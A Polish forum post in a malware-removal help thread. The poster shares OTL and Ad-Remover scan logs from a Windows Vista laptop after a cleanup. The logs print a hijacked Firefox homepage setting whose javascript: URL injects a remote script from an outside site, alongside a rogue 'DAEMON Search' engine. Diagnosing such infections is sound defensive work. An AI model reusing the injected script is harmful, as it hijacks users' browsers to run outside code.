szefcu45 komentarz 23 lipca 2011 Autor komentarz 23 lipca 2011 (edytowane) Przepraszam, że dopiero teraz, ale wcześniej nie miałem okazji dostać się do laptopa. Daemon Tools Toolbar usunięty. OTL po restarcie(po wykonaniu skryptu) [log] All processes killed ========== OTL ========== Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\BLOG\ not found. Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\ChomikBox\ not found. Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\HotKeysCmds\ not found. Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\IgfxTray\ not found. Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\Persistence\ not found. Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\PWMTRV\ not found. Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\Skype\ not found. Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\TpShocks\ not found. Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\TrackPointSrv\ not found. Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\StartUpReg\Windows Defender\ not found. Registry value HKEY_USERS\S-1-5-21-3224443864-345457774-4058443421-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Tok-Cirrhatus not found. Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\ not found. Error: No service named Harmonogram automatycznej usługi LiveUpdate was found to stop! Service\Driver key Harmonogram automatycznej usługi LiveUpdate not found. Unable to delete ADS C:\ProgramData\TEMP:CB0AACC9 . ========== REGISTRY ========== Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\ deleted successfully. ========== COMMANDS ========== [EMPTYFLASH] User: All Users User: Default User: Default User User: Max ->Flash cache emptied: 0 bytes User: Public Total Flash Files Cleaned = 0,00 mb [EMPTYTEMP] User: All Users User: Default ->Temp folder emptied: 0 bytes ->Temporary Internet Files folder emptied: 0 bytes User: Default User ->Temp folder emptied: 0 bytes ->Temporary Internet Files folder emptied: 0 bytes User: Max ->Temp folder emptied: 666066771 bytes ->Temporary Internet Files folder emptied: 985118059 bytes ->FireFox cache emptied: 43681357 bytes ->Google Chrome cache emptied: 13931917 bytes ->Opera cache emptied: 240 bytes ->Flash cache emptied: 0 bytes User: Public %systemdrive% .tmp files removed: 0 bytes %systemroot% .tmp files removed: 0 bytes %systemroot%\System32 .tmp files removed: 0 bytes %systemroot%\System32\drivers .tmp files removed: 0 bytes Windows Temp folder emptied: 367610 bytes RecycleBin emptied: 5350629 bytes Total Files Cleaned = 1 635,00 mb OTL by OldTimer - Version 3.2.26.1 log created on 07232011_144428 Files\Folders moved on Reboot... Registry entries deleted on Reboot... [/log] Ad-Remover [log] ======= REPORT FROM AD-REMOVER 2.0.0.2,G | ONLY XP/VISTA/7 ======= Updated by TeamXscript on 12/04/11 Contact: AdRemover[DOT]contact[AT]gmail[DOT]com website: http://www.teamxscript.org C:\Program Files\Ad-Remover\main.exe (CLEAN [1]) -> Launched at 14:51:46 on 23/07/2011, Normal boot Microsoft® Windows Vista™ Home Premium (X86) Max@MAX-PC (LENOVO 7650E6G) ============== ACTION(S) ============== (!) -- Temporary files deleted. ============== ADDITIONNAL SCAN ============== **** Mozilla Firefox Version [5.0.1 (pl)] **** Searchplugins\allegro-pl.xml (hxxp://www.allegro.pl/search.php?string={searchTerms}&sourceid=Mozilla-search) Searchplugins\fbc-pl.xml (hxxp://fbc.pionier.net.pl/owoc/results) Searchplugins\merlin-pl.xml (hxxp://www.merlin.com.pl/frontend/search?sourceid=Mozilla-search&fraza={searchTerms}&skad=crhhxmkohb) Searchplugins\pwn-pl.xml (hxxp://encyklopedia.pwn.pl/szukaj.php?co={searchTerms}) Searchplugins\wikipedia-pl.xml (hxxp://pl.wikipedia.org/wiki/Specjalna:Szukaj) Searchplugins\wp-pl.xml (hxxp://szukaj.wp.pl/szukaj.html?z=T&r=T&szukaj={searchTerms}) Components\browsercomps.dll (Mozilla Foundation) -- C:\Users\Max\AppData\Roaming\Mozilla\FireFox\Profiles\nx4xd3id.default -- Extensions\nostmp (?) Extensions\{E2883E8F-472F-4fb0-9522-AC9BF37916A7} (Adobe DLM (powered by getPlus(R))) Prefs.js - browser.download.lastDir, C:\\Users\\Max\\Desktop Prefs.js - browser.search.selectedEngine, DAEMON Search Prefs.js - browser.startup.homepage, hxxp://my.daemon-search.com/|javascript:(function(){function%20a(o){var%20script=document.crea... Prefs.js - browser.startup.homepage_override.buildID, 20110707182747 Prefs.js - browser.startup.homepage_override.mstone, rv:5.0.1 ======================================== **** Internet Explorer Version [7.0.6000.16982] **** HKCU_Main|Default_Page_URL - hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome HKCU_Main|Default_Search_URL - hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKCU_Main|Search bar - hxxp://go.microsoft.com/fwlink/?linkid=54896 HKCU_Main|Start Page - hxxp://fr.msn.com/ HKLM_Main|Default_Page_URL - hxxp://go.microsoft.com/fwlink/?LinkId=54896 HKLM_Main|Default_Search_URL - hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKLM_Main|Search bar - hxxp://search.msn.com/spbasic.htm HKLM_Main|Search Page - hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKLM_Main|Start Page - hxxp://fr.msn.com/ HKCU_Toolbar\WebBrowser|{BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} (c:\Program Files\Windows Live Toolbar\msntb.dll) HKCU_Toolbar\WebBrowser|{32099AAC-C132-4136-9E9A-4E364A424E17} (x) HKLM_Toolbar|{90222687-F593-4738-B738-FBEE9C7B26DF} (C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\UIBHO.dll) HKLM_Toolbar|{BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} (c:\Program Files\Windows Live Toolbar\msntb.dll) HKLM_Toolbar|{8E5E2654-AD2D-48bf-AC2D-D17F00898D06} (C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll) HKLM_ElevationPolicy\{2c27f5f6-6501-467c-b313-cbe72d71a688} - C:\Program Files\BitSpirit\BitSpirit.exe (x) HKLM_Extensions\{0045D4BC-5189-4b67-969C-83BB1906C421} - "?" (?) HKLM_Extensions\{08B0E5C0-4FCB-11CF-AAA5-00401C608501} - "?" (?) HKLM_Extensions\{CCA281CA-C863-46ef-9331-5C8D4460577F} - "@btrez.dll,-4015" (C:\Program Files\ThinkPad\Bluetooth Software\bt_cold_icon.ico) BHO\{1E8A6170-7264-4D0F-BEAE-D42A53123C75} - "?" (C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBho.dll) BHO\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - "SSVHelper Class" (C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll) BHO\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - "avast! WebRep" (C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll) BHO\{F040E541-A427-4CF7-85D8-75E3E0F476C5} - "CPwmIEBrowserHelper Object" (C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll) ======================================== C:\Program Files\Ad-Remover\Quarantine: 0 File(s) C:\Program Files\Ad-Remover\Backup: 15 File(s) C:\Ad-Report-CLEAN[1].txt - 23/07/2011 14:51:58 (4115 Byte(s)) End at: 14:52:56, 23/07/2011 ============== E.O.F ============== [/log] OTL po czyszczeniu Ad-Removerem [log] OTL logfile created on: 2011-07-23 14:58:44 - Run 2 OTL by OldTimer - Version 3.2.26.1 Folder = C:\7'\naprawa\rejestr Windows Vista Home Premium Edition (Version = 6.0.6000) - Type = NTWorkstation Internet Explorer (Version = 7.0.6000.16982) Locale: 00000415 | Country: Polska | Language: PLK | Date Format: yyyy-MM-dd 1,99 Gb Total Physical Memory | 1,14 Gb Available Physical Memory | 57,16% Memory free 4,21 Gb Paging File | 3,39 Gb Available in Paging File | 80,51% Paging File free Paging file location(s): ?:\pagefile.sys [binary data] %SystemDrive% = C: | %SystemRoot% = C:\Windows | %ProgramFiles% = C:\Program Files Drive C: | 142,25 Gb Total Space | 46,03 Gb Free Space | 32,36% Space Free | Partition Type: NTFS Drive D: | 472,11 Mb Total Space | 143,40 Mb Free Space | 30,37% Space Free | Partition Type: FAT Computer Name: MAX-PC | User Name: Max | Logged in as Administrator. Boot Mode: Normal | Scan Mode: Current user Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days [color=#E56717]========== Processes (SafeList) ==========[/color] PRC - [2011-07-18 09:36:20 | 000,579,584 | ---- | M] (OldTimer Tools) -- C:\7'\naprawa\rejestr\OTL.exe PRC - [2011-07-04 13:43:54 | 003,493,720 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastUI.exe PRC - [2011-07-04 13:43:51 | 000,042,184 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe PRC - [2011-05-18 18:32:40 | 001,233,856 | ---- | M] (Simply Super Software) -- C:\Program Files\Trojan Remover\Trjscan.exe PRC - [2011-04-12 13:45:20 | 000,527,371 | ---- | M] () -- C:\Program Files\Ad-Remover\main.exe PRC - [2011-04-04 15:24:56 | 002,923,520 | ---- | M] (Microsoft Corporation) -- C:\Windows\explorer.exe PRC - [2007-07-10 16:56:04 | 000,569,344 | ---- | M] () -- C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe PRC - [2007-03-14 16:42:48 | 000,321,088 | ---- | M] (Pure Networks, Inc.) -- C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe [color=#E56717]========== Modules (SafeList) ==========[/color] MOD - [2011-07-18 09:36:20 | 000,579,584 | ---- | M] (OldTimer Tools) -- C:\7'\naprawa\rejestr\OTL.exe MOD - [2011-07-04 13:43:51 | 000,199,792 | ---- | M] (AVAST Software) -- C:\Program Files\AVAST Software\Avast\snxhk.dll MOD - [2006-11-02 11:38:57 | 001,648,128 | ---- | M] (Microsoft Corporation) -- C:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.6000.16386_none_5d07289e07e1d100\comctl32.dll [color=#E56717]========== Win32 Services (SafeList) ==========[/color] SRV - [2011-07-04 13:43:51 | 000,042,184 | ---- | M] (AVAST Software) [Auto | Running] -- C:\Program Files\AVAST Software\Avast\AvastSvc.exe -- (avast! Antivirus) SRV - [2010-01-15 14:49:20 | 000,227,232 | ---- | M] (McAfee, Inc.) [Disabled | Stopped] -- C:\Program Files\McAfee Security Scan\2.0.181\McCHSvc.exe -- (McComponentHostService) SRV - [2008-11-10 22:07:42 | 000,265,912 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Program Files\Windows Defender\MpSvc.dll -- (WinDefend) SRV - [2008-11-10 14:37:17 | 001,174,664 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe -- (Symantec Core LC) SRV - [2008-01-29 17:38:32 | 000,583,048 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\PIF\{B8E1DD85-8582-4c61-B58F-2F227FCA9A08}\PIFSvc.exe -- (LiveUpdate Notice Service) SRV - [2007-09-26 16:23:26 | 002,999,664 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Symantec\LiveUpdate\LuComServer_3_2.EXE -- (LiveUpdate) SRV - [2007-07-10 16:56:04 | 000,569,344 | ---- | M] () [Auto | Running] -- C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe -- (TVT Backup Protection Service) SRV - [2007-07-10 16:37:38 | 000,644,408 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe -- (ThinkVantage Registry Monitor Service) SRV - [2007-07-10 15:40:14 | 000,045,056 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\Lenovo\Rescue and Recovery\ADM\IUService.exe -- (tvtnetwk) SRV - [2007-07-05 16:48:54 | 000,206,120 | ---- | M] (Lenovo) [Disabled | Stopped] -- C:\Program Files\ThinkPad\ConnectUtilities\AcSvc.exe -- (AcSvc) SRV - [2007-07-05 16:48:50 | 000,091,432 | ---- | M] (Lenovo) [Disabled | Stopped] -- C:\Program Files\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe -- (AcPrfMgrSvc) SRV - [2007-06-07 17:43:46 | 000,013,312 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- c:\Program Files\Lenovo\System Update\SUService.exe -- (SUService) SRV - [2007-03-14 16:42:48 | 000,321,088 | ---- | M] (Pure Networks, Inc.) [Auto | Running] -- C:\Program Files\Pure Networks\Network Magic\nmsrvc.exe -- (nmservice) SRV - [2007-03-14 16:42:22 | 000,012,800 | ---- | M] (Pure Networks, Inc.) [On_Demand | Stopped] -- C:\Program Files\Pure Networks\Network Magic\WebServer\bin\nmraapache.exe -- (nmraapache) SRV - [2007-03-02 07:07:28 | 000,055,936 | ---- | M] () [Disabled | Stopped] -- C:\Program Files\Lenovo\HOTKEY\TPHKSVC.exe -- (TPHKSVC) SRV - [2007-01-30 05:05:02 | 000,108,080 | ---- | M] (Lenovo Group Limited) [Disabled | Stopped] -- C:\Windows\System32\IPSSVC.EXE -- (IPSSVC) SRV - [2007-01-14 01:11:06 | 000,080,504 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Norton Internet Security\isPwdSvc.exe -- (ISPwdSvc) SRV - [2007-01-12 21:40:58 | 000,049,248 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\VAScanner\comHost.exe -- (comHost) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (LiveUpdate Notice Ex) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (CLTNetCnService) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (ccSetMgr) SRV - [2007-01-09 23:59:32 | 000,108,648 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe -- (ccEvtMgr) SRV - [2007-01-05 02:19:28 | 000,047,712 | ---- | M] (Symantec Corporation) [Disabled | Stopped] -- C:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe -- (SymAppCore) SRV - [2006-11-15 17:20:46 | 000,634,988 | ---- | M] (Diskeeper Corporation) [Disabled | Stopped] -- C:\Program Files\Diskeeper Corporation\Diskeeper\DkService.exe -- (Diskeeper) [color=#E56717]========== Driver Services (SafeList) ==========[/color] DRV - [2011-07-04 13:36:43 | 000,441,176 | ---- | M] (AVAST Software) [File_System | System | Running] -- C:\Windows\System32\drivers\aswSnx.sys -- (aswSnx) DRV - [2011-07-04 13:36:32 | 000,309,848 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswSP.sys -- (aswSP) DRV - [2011-07-04 13:35:23 | 000,043,608 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswTdi.sys -- (aswTdi) DRV - [2011-07-04 13:32:32 | 000,025,432 | ---- | M] (AVAST Software) [Kernel | System | Running] -- C:\Windows\System32\drivers\aswRdr.sys -- (aswRdr) DRV - [2011-07-04 13:32:20 | 000,054,104 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswMonFlt.sys -- (aswMonFlt) DRV - [2011-07-04 13:32:12 | 000,019,544 | ---- | M] (AVAST Software) [File_System | Auto | Running] -- C:\Windows\System32\drivers\aswFsBlk.sys -- (aswFsBlk) DRV - [2008-11-10 14:39:02 | 000,115,000 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\SYMEVENT.SYS -- (SymEvent) DRV - [2008-05-02 10:58:14 | 000,008,064 | ---- | M] (Windows (R) Codename Longhorn DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\usbser_lowerflt.sys -- (upperdev) DRV - [2008-05-02 10:58:12 | 000,017,536 | ---- | M] (Nokia) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\ccdcmb.sys -- (nmwcd) DRV - [2007-12-06 19:11:00 | 000,012,080 | ---- | M] () [Kernel | System | Running] -- C:\Windows\System32\drivers\TPPWR32V.SYS -- (TPPWRIF) DRV - [2007-10-16 19:33:00 | 000,103,472 | ---- | M] (Lenovo.) [Kernel | Boot | Running] -- C:\Windows\System32\DRIVERS\Apsx86.sys -- (Shockprf) DRV - [2007-10-16 19:32:00 | 000,019,504 | ---- | M] (Lenovo.) [Kernel | Boot | Running] -- C:\Windows\System32\DRIVERS\ApsHM86.sys -- (TPDIGIMN) DRV - [2007-05-22 16:59:38 | 000,030,336 | ---- | M] (Lenovo (United States) Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\tvti2c.sys -- (TVTI2C) DRV - [2007-05-22 09:59:34 | 000,021,376 | ---- | M] (Lenovo (United States) Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\psadd.sys -- (psadd) DRV - [2007-04-29 23:45:18 | 002,219,520 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\NETw4v32.sys -- (NETw4v32) Sterownik karty Intel(R) DRV - [2007-04-27 08:29:54 | 000,215,040 | ---- | M] (Conexant Systems Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\CHDARTN.sys -- (HdAudAddService) DRV - [2007-04-10 03:59:00 | 000,008,704 | ---- | M] (Conexant Systems, Inc.) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\XAudio.sys -- (XAudio) DRV - [2007-01-11 20:22:20 | 000,276,792 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\srtspl.sys -- (SRTSPL) DRV - [2007-01-11 20:22:18 | 000,025,400 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\System32\drivers\srtspx.sys -- (SRTSPX) DRV - [2007-01-11 20:22:14 | 000,247,608 | ---- | M] (Symantec Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\System32\drivers\srtsp.sys -- (SRTSP) DRV - [2007-01-10 03:00:00 | 000,833,048 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Symantec\Definitions\VirusDefs\20070110.052\NAVEX15.SYS -- (NAVEX15) DRV - [2007-01-10 03:00:00 | 000,387,384 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys -- (eeCtrl) DRV - [2007-01-10 03:00:00 | 000,102,712 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys -- (EraserUtilRebootDrv) DRV - [2007-01-10 03:00:00 | 000,080,408 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\ProgramData\Symantec\Definitions\VirusDefs\20070110.052\NAVENG.SYS -- (NAVENG) DRV - [2007-01-09 16:32:14 | 000,191,544 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\Windows\System32\Drivers\SYMTDI.SYS -- (SYMTDI) DRV - [2007-01-09 16:32:14 | 000,145,976 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMFW.SYS -- (SYMFW) DRV - [2007-01-09 16:32:14 | 000,040,120 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMIDS.SYS -- (SYMIDS) DRV - [2007-01-09 16:32:14 | 000,038,200 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMNDISV.SYS -- (SYMNDISV) DRV - [2007-01-09 16:32:14 | 000,027,576 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMREDRV.SYS -- (SYMREDRV) DRV - [2007-01-09 16:32:14 | 000,012,984 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\Drivers\SYMDNS.SYS -- (SYMDNS) DRV - [2007-01-03 09:05:02 | 000,417,592 | ---- | M] (Symantec Corporation) [Kernel | On_Demand | Stopped] -- C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys -- (SPBBCDrv) DRV - [2006-12-28 00:48:26 | 000,212,280 | ---- | M] (Symantec Corporation) [Kernel | System | Running] -- C:\ProgramData\Symantec\Definitions\SymcData\idsdefs\20070108.003\IDSvix86.sys -- (IDSvix86) DRV - [2006-11-06 10:24:56 | 000,012,080 | ---- | M] (Lenovo Group Limited) [Kernel | Auto | Running] -- C:\Windows\System32\drivers\PROCDD.SYS -- (PROCDD) DRV - [2006-11-02 09:30:54 | 001,781,760 | ---- | M] (Intel® Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\NETw3v32.sys -- (NETw3v32) Sterownik karty Intel(R) DRV - [2006-08-30 12:04:04 | 000,013,744 | ---- | M] (Lenovo Group Limited) [Kernel | System | Running] -- C:\Windows\System32\drivers\smiif32.sys -- (lenovo.smi) [color=#E56717]========== Standard Registry (SafeList) ==========[/color] [color=#E56717]========== Internet Explorer ==========[/color] IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = %SystemRoot%\system32\blank.htm IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search bar = http://search.msn.com/spbasic.htm IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://fr.msn.com/ IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = [Binary data over 100 bytes] IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://fr.msn.com/ IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,StartPageCache = 1 IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0 [color=#E56717]========== FireFox ==========[/color] FF - prefs.js..browser.search.selectedEngine: "DAEMON Search" FF - prefs.js..browser.startup.homepage: "http://my.daemon-search.com/|javascript:(function(){function%20a(o){var%20script=document.createElement('script'script.id='stylujDodajObrazki';script.type='text/javascript';script.src='http://stylistki.pl/scripts/dodajObrazki.js?'+(new%20Date()).getTime();o.body.appendChild(script);}a(document);})();"); FF - prefs.js..extensions.enabledItems: {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}:1.3.6 FF - prefs.js..extensions.enabledItems: {E2883E8F-472F-4fb0-9522-AC9BF37916A7}:1.6.2.103 FF - prefs.js..extensions.enabledItems: {82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}:5.3.0.7550 FF - prefs.js..extensions.enabledItems: wrc@avast.com:6.0.1203 FF - prefs.js..extensions.enabledItems: DTToolbar@toolbarnet.com:1.1.4.0024 FF - prefs.js..network.proxy.type: 0 FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32.dll () FF - HKLM\Software\MozillaPlugins\@google.com/npPicasa3,version=3.0.0: C:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.) FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\4.0.60531.0\npctrl.dll ( Microsoft Corporation) FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation) FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\wrc@avast.com: C:\Program Files\AVAST Software\Avast\WebRep\FF [2011-07-08 14:35:29 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 5.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2011-07-12 14:30:45 | 000,000,000 | ---D | M] FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 5.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2011-07-12 14:22:06 | 000,000,000 | ---D | M] [2011-04-02 18:52:42 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Extensions [2011-07-23 14:51:15 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions [2011-04-30 22:03:44 | 000,000,000 | ---D | M] (Adblock Plus) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} [2011-06-08 22:14:38 | 000,000,000 | ---D | M] (Adobe DLM (powered by getPlus(R))) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\{E2883E8F-472F-4fb0-9522-AC9BF37916A7} [2011-07-12 14:30:53 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Max\AppData\Roaming\mozilla\Firefox\Profiles\nx4xd3id.default\extensions\nostmp [2011-07-11 13:14:03 | 000,002,055 | ---- | M] () -- C:\Users\Max\AppData\Roaming\Mozilla\Firefox\Profiles\nx4xd3id.default\searchplugins\daemon-search.xml [2011-07-12 14:30:44 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions File not found (No name found) -- [2011-07-08 14:35:29 | 000,000,000 | ---D | M] (avast! WebRep) -- C:\PROGRAM FILES\AVAST SOFTWARE\AVAST\WEBREP\FF [2011-04-05 06:54:09 | 000,000,000 | ---D | M] (Microsoft .NET Framework Assistant) -- C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V3.5\WINDOWS PRESENTATION FOUNDATION\DOTNETASSISTANTEXTENSION [2011-07-08 09:50:30 | 000,142,296 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll [2010-01-01 10:00:00 | 000,002,767 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\allegro-pl.xml [2010-01-01 10:00:00 | 000,001,406 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\fbc-pl.xml [2010-01-01 10:00:00 | 000,000,917 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\merlin-pl.xml [2010-01-01 10:00:00 | 000,000,858 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\pwn-pl.xml [2010-01-01 10:00:00 | 000,001,183 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-pl.xml [2010-01-01 10:00:00 | 000,001,683 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wp-pl.xml O1 HOSTS File: ([2006-09-18 23:41:30 | 000,000,761 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts O1 - Hosts: 127.0.0.1 localhost O1 - Hosts: ::1 localhost O2 - BHO: (no name) - {1E8A6170-7264-4D0F-BEAE-D42A53123C75} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\NppBHO.dll (Symantec Corporation) O2 - BHO: (SSVHelper Class) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_02\bin\ssv.dll (Sun Microsystems, Inc.) O2 - BHO: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) O2 - BHO: (Windows Live Toolbar Helper) - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O2 - BHO: (CPwmIEBrowserHelper Object) - {F040E541-A427-4CF7-85D8-75E3E0F476C5} - C:\Program Files\Lenovo\Client Security Solution\tvtpwm_ie_com.dll (Lenovo Group Limited) O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software) O3 - HKLM\..\Toolbar: (Show Norton Toolbar) - {90222687-F593-4738-B738-FBEE9C7B26DF} - C:\Program Files\Common Files\Symantec Shared\coShared\Browser\1.5\UIBHO.dll (Symantec Corporation) O3 - HKLM\..\Toolbar: (Windows Live Toolbar) - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - c:\Program Files\Windows Live Toolbar\msntb.dll (Microsoft Corporation) O3 - HKCU\..\Toolbar\WebBrowser: (no name) - {32099AAC-C132-4136-9E9A-4E364A424E17} - No CLSID value found. O3 - 